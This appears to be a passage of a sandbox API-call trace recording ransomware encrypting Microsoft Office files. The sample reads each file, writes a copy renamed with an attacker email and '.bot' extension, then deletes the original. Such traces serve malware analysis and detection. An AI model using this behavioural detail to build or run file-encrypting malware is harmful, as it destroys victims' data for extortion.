	[0150.220] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0150.220] lstrlenW (lpString=".rar") returned 4
	[0150.220] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0150.220] lstrlenW (lpString=".bz2") returned 4
	[0150.220] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0150.220] lstrlenW (lpString=".7z") returned 3
	[0150.220] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0150.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QRYINT32.DLL") returned 60
	[0150.220] lstrlenW (lpString=".dbf") returned 4
	[0150.220] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0150.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QRYINT32.DLL") returned 60
	[0150.220] lstrlenW (lpString=".1cd") returned 4
	[0150.220] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0150.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QRYINT32.DLL") returned 60
	[0150.220] lstrlenW (lpString=".jpg") returned 4
	[0150.220] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0150.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QRYINT32.DLL") returned 60
	[0150.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QRYINT32.DLL") returned 60
	[0150.328] lstrlenW (lpString=".doc") returned 4
	[0150.328] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0150.328] lstrlenW (lpString=".docx") returned 5
	[0150.328] lstrcmpiW (lpString1=".docx", lpString2="2.DLL") returned -1
	[0150.328] lstrlenW (lpString=".pdf") returned 4
	[0150.328] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0150.328] lstrlenW (lpString=".xls") returned 4
	[0150.328] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0150.329] lstrlenW (lpString=".xlsx") returned 5
	[0150.329] lstrcmpiW (lpString1=".xlsx", lpString2="2.DLL") returned -1
	[0150.329] lstrlenW (lpString=".ppt") returned 4
	[0150.329] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0150.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QRYINT32.DLL") returned 60
	[0150.329] lstrlenW (lpString=".zip") returned 4
	[0150.329] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0150.329] lstrlenW (lpString=".rar") returned 4
	[0150.329] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0150.329] lstrlenW (lpString=".bz2") returned 4
	[0150.329] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0150.329] lstrlenW (lpString=".7z") returned 3
	[0150.329] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0150.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QRYINT32.DLL") returned 60
	[0150.329] lstrlenW (lpString=".dbf") returned 4
	[0150.329] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0150.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QRYINT32.DLL") returned 60
	[0150.329] lstrlenW (lpString=".1cd") returned 4
	[0150.329] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0150.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QRYINT32.DLL") returned 60
	[0150.329] lstrlenW (lpString=".jpg") returned 4
	[0150.329] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0150.330] lstrcmpiW (lpString1=".HXS", lpString2=".bot") returned 1
	[0150.330] lstrlenW (lpString="SETLANG.HXS") returned 11
	[0150.330] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\setlang.hxs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0150.335] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=397828) returned 1
	[0150.335] CloseHandle (hObject=0x388) returned 1
	[0150.335] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\setlang.hxs")) returned 0x20
	[0150.335] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\setlang.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.335] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\setlang.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0150.336] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.336] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.336] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\setlang.hxs.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0150.336] GetLastError () returned 0x0
	[0150.336] ReadFile (in: hFile=0x388, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x61204, lpOverlapped=0x0) returned 1
	[0150.369] WriteFile (in: hFile=0x3bc, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x61210, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x61210, lpOverlapped=0x0) returned 1
	[0150.376] ReadFile (in: hFile=0x388, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.376] WriteFile (in: hFile=0x3bc, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0150.376] SetEndOfFile (hFile=0x3bc) returned 1
	[0150.376] CloseHandle (hObject=0x3bc) returned 1
	[0150.376] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.377] SetEndOfFile (hFile=0x388) returned 1
	[0150.385] CloseHandle (hObject=0x388) returned 1
	[0150.385] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG.HXS.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.385] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\setlang.hxs")) returned 1
	[0150.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG.HXS") returned 59
	[0150.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG.HXS") returned 59
	[0150.386] lstrlenW (lpString=".doc") returned 4
	[0150.386] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0150.386] lstrlenW (lpString=".docx") returned 5
	[0150.386] lstrcmpiW (lpString1=".docx", lpString2="G.HXS") returned -1
	[0150.386] lstrlenW (lpString=".pdf") returned 4
	[0150.386] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0150.386] lstrlenW (lpString=".xls") returned 4
	[0150.386] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0150.386] lstrlenW (lpString=".xlsx") returned 5
	[0150.386] lstrcmpiW (lpString1=".xlsx", lpString2="G.HXS") returned -1
	[0150.386] lstrlenW (lpString=".ppt") returned 4
	[0150.386] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0150.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG.HXS") returned 59
	[0150.387] lstrlenW (lpString=".zip") returned 4
	[0150.387] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0150.387] lstrlenW (lpString=".rar") returned 4
	[0150.387] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0150.387] lstrlenW (lpString=".bz2") returned 4
	[0150.387] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0150.387] lstrlenW (lpString=".7z") returned 3
	[0150.387] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0150.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG.HXS") returned 59
	[0150.387] lstrlenW (lpString=".dbf") returned 4
	[0150.387] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0150.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG.HXS") returned 59
	[0150.387] lstrlenW (lpString=".1cd") returned 4
	[0150.387] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0150.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG.HXS") returned 59
	[0150.387] lstrlenW (lpString=".jpg") returned 4
	[0150.387] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0150.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG.HXS") returned 59
	[0150.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG.HXS") returned 59
	[0150.387] lstrlenW (lpString=".doc") returned 4
	[0150.387] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0150.387] lstrlenW (lpString=".docx") returned 5
	[0150.387] lstrcmpiW (lpString1=".docx", lpString2="G.HXS") returned -1
	[0150.387] lstrlenW (lpString=".pdf") returned 4
	[0150.387] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0150.387] lstrlenW (lpString=".xls") returned 4
	[0150.387] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0150.387] lstrlenW (lpString=".xlsx") returned 5
	[0150.387] lstrcmpiW (lpString1=".xlsx", lpString2="G.HXS") returned -1
	[0150.387] lstrlenW (lpString=".ppt") returned 4
	[0150.388] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0150.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG.HXS") returned 59
	[0150.388] lstrlenW (lpString=".zip") returned 4
	[0150.388] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0150.388] lstrlenW (lpString=".rar") returned 4
	[0150.388] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0150.388] lstrlenW (lpString=".bz2") returned 4
	[0150.388] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0150.388] lstrlenW (lpString=".7z") returned 3
	[0150.388] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0150.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG.HXS") returned 59
	[0150.388] lstrlenW (lpString=".dbf") returned 4
	[0150.388] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0150.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG.HXS") returned 59
	[0150.388] lstrlenW (lpString=".1cd") returned 4
	[0150.388] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0150.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG.HXS") returned 59
	[0150.388] lstrlenW (lpString=".jpg") returned 4
	[0150.388] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0150.388] lstrcmpiW (lpString1=".HXT", lpString2=".bot") returned 1
	[0150.388] lstrlenW (lpString="SETLANG_COL.HXT") returned 15
	[0150.388] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\setlang_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0150.389] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=207) returned 1
	[0150.389] CloseHandle (hObject=0x388) returned 1
	[0150.389] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\setlang_col.hxt")) returned 0x20
	[0150.389] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\setlang_col.hxt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.389] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\setlang_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0150.389] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.389] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.390] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\setlang_col.hxt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0150.390] GetLastError () returned 0x0
	[0150.390] ReadFile (in: hFile=0x388, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0xcf, lpOverlapped=0x0) returned 1
	[0150.455] WriteFile (in: hFile=0x3bc, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xd0, lpOverlapped=0x0) returned 1
	[0150.456] ReadFile (in: hFile=0x388, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.456] WriteFile (in: hFile=0x3bc, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xf2, lpOverlapped=0x0) returned 1
	[0150.456] SetEndOfFile (hFile=0x3bc) returned 1
	[0150.457] CloseHandle (hObject=0x3bc) returned 1
	[0150.457] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.457] SetEndOfFile (hFile=0x388) returned 1
	[0150.459] CloseHandle (hObject=0x388) returned 1
	[0150.459] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.459] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\setlang_col.hxt")) returned 1
	[0150.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXT") returned 63
	[0150.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXT") returned 63
	[0150.460] lstrlenW (lpString=".doc") returned 4
	[0150.460] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0150.460] lstrlenW (lpString=".docx") returned 5
	[0150.460] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0150.460] lstrlenW (lpString=".pdf") returned 4
	[0150.460] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0150.460] lstrlenW (lpString=".xls") returned 4
	[0150.460] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0150.460] lstrlenW (lpString=".xlsx") returned 5
	[0150.460] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0150.460] lstrlenW (lpString=".ppt") returned 4
	[0150.460] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0150.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXT") returned 63
	[0150.460] lstrlenW (lpString=".zip") returned 4
	[0150.460] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0150.460] lstrlenW (lpString=".rar") returned 4
	[0150.460] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0150.460] lstrlenW (lpString=".bz2") returned 4
	[0150.460] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0150.461] lstrlenW (lpString=".7z") returned 3
	[0150.461] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0150.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXT") returned 63
	[0150.461] lstrlenW (lpString=".dbf") returned 4
	[0150.461] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0150.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXT") returned 63
	[0150.461] lstrlenW (lpString=".1cd") returned 4
	[0150.461] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0150.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXT") returned 63
	[0150.461] lstrlenW (lpString=".jpg") returned 4
	[0150.461] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0150.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXT") returned 63
	[0150.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXT") returned 63
	[0150.461] lstrlenW (lpString=".doc") returned 4
	[0150.461] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0150.461] lstrlenW (lpString=".docx") returned 5
	[0150.461] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0150.461] lstrlenW (lpString=".pdf") returned 4
	[0150.461] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0150.461] lstrlenW (lpString=".xls") returned 4
	[0150.461] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0150.461] lstrlenW (lpString=".xlsx") returned 5
	[0150.461] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0150.461] lstrlenW (lpString=".ppt") returned 4
	[0150.461] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0150.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXT") returned 63
	[0150.461] lstrlenW (lpString=".zip") returned 4
	[0150.461] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0150.461] lstrlenW (lpString=".rar") returned 4
	[0150.461] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0150.461] lstrlenW (lpString=".bz2") returned 4
	[0150.462] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0150.462] lstrlenW (lpString=".7z") returned 3
	[0150.462] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0150.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXT") returned 63
	[0150.462] lstrlenW (lpString=".dbf") returned 4
	[0150.462] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0150.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXT") returned 63
	[0150.462] lstrlenW (lpString=".1cd") returned 4
	[0150.462] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0150.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXT") returned 63
	[0150.462] lstrlenW (lpString=".jpg") returned 4
	[0150.462] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0150.462] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0150.462] lstrlenW (lpString="SGRES.DLL") returned 9
	[0150.462] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SGRES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\sgres.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0150.479] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=68984) returned 1
	[0150.479] CloseHandle (hObject=0x3d0) returned 1
	[0150.479] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SGRES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\sgres.dll")) returned 0x20
	[0150.845] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SGRES.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\sgres.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.899] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SGRES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\sgres.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0150.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SGRES.DLL") returned 57
	[0150.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SGRES.DLL") returned 57
	[0150.899] lstrlenW (lpString=".doc") returned 4
	[0150.900] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0150.900] lstrlenW (lpString=".docx") returned 5
	[0150.900] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0150.900] lstrlenW (lpString=".pdf") returned 4
	[0150.900] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0150.900] lstrlenW (lpString=".xls") returned 4
	[0150.900] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0150.900] lstrlenW (lpString=".xlsx") returned 5
	[0150.900] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0150.900] lstrlenW (lpString=".ppt") returned 4
	[0150.900] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0150.900] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SGRES.DLL") returned 57
	[0150.900] lstrlenW (lpString=".zip") returned 4
	[0150.900] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0150.900] lstrlenW (lpString=".rar") returned 4
	[0150.900] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0150.900] lstrlenW (lpString=".bz2") returned 4
	[0150.900] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0150.900] lstrlenW (lpString=".7z") returned 3
	[0150.900] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0150.900] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SGRES.DLL") returned 57
	[0150.900] lstrlenW (lpString=".dbf") returned 4
	[0150.900] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0150.900] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SGRES.DLL") returned 57
	[0150.900] lstrlenW (lpString=".1cd") returned 4
	[0150.900] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0150.900] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SGRES.DLL") returned 57
	[0150.900] lstrlenW (lpString=".jpg") returned 4
	[0150.900] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0150.900] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SGRES.DLL") returned 57
	[0150.900] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SGRES.DLL") returned 57
	[0150.901] lstrlenW (lpString=".doc") returned 4
	[0150.901] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0150.901] lstrlenW (lpString=".docx") returned 5
	[0150.901] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0150.901] lstrlenW (lpString=".pdf") returned 4
	[0150.901] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0150.901] lstrlenW (lpString=".xls") returned 4
	[0150.901] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0150.901] lstrlenW (lpString=".xlsx") returned 5
	[0150.901] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0150.901] lstrlenW (lpString=".ppt") returned 4
	[0150.901] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0150.901] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SGRES.DLL") returned 57
	[0150.901] lstrlenW (lpString=".zip") returned 4
	[0150.901] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0150.901] lstrlenW (lpString=".rar") returned 4
	[0150.901] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0150.901] lstrlenW (lpString=".bz2") returned 4
	[0150.901] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0150.901] lstrlenW (lpString=".7z") returned 3
	[0150.901] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0150.901] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SGRES.DLL") returned 57
	[0150.901] lstrlenW (lpString=".dbf") returned 4
	[0150.901] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0150.901] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SGRES.DLL") returned 57
	[0150.901] lstrlenW (lpString=".1cd") returned 4
	[0150.901] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0150.901] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SGRES.DLL") returned 57
	[0150.901] lstrlenW (lpString=".jpg") returned 4
	[0150.901] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0150.902] lstrcmpiW (lpString1=".VSL", lpString2=".bot") returned 1
	[0150.902] lstrlenW (lpString="UML.VSL") returned 7
